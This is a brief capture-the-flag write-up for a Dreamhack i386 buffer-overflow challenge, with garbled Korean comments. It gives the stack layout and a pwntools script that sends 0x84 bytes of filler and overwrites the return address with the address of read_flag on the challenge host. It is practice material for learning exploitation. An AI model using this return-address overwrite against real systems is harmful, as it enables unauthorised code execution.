์ ์ฃผ์: 0x80485b9 buffer size: 0x80 Arch: i386-32-little memory layout: ... buf (0x80 byte) SFP (0x4 byte) ret address (0x4 byte) ... payload (should be 0x88 byte): ์ฐ๋ ๊ธฐ ๊ฐ (0x84 byte) read_flag์ ์ฃผ์ (0x4 byte) from pwn import * p = remote("host3.dreamhack.games", 9796) # ์ฐ๋ ๊ธฐ ๊ฐ payload = b"\x41" * 0x84 # ์ ธ์ฝ๋์ ์ฃผ์ ์ถ๊ฐ payload += b"\xb9\x85\x04\x08" p.send(payload) p.interactive()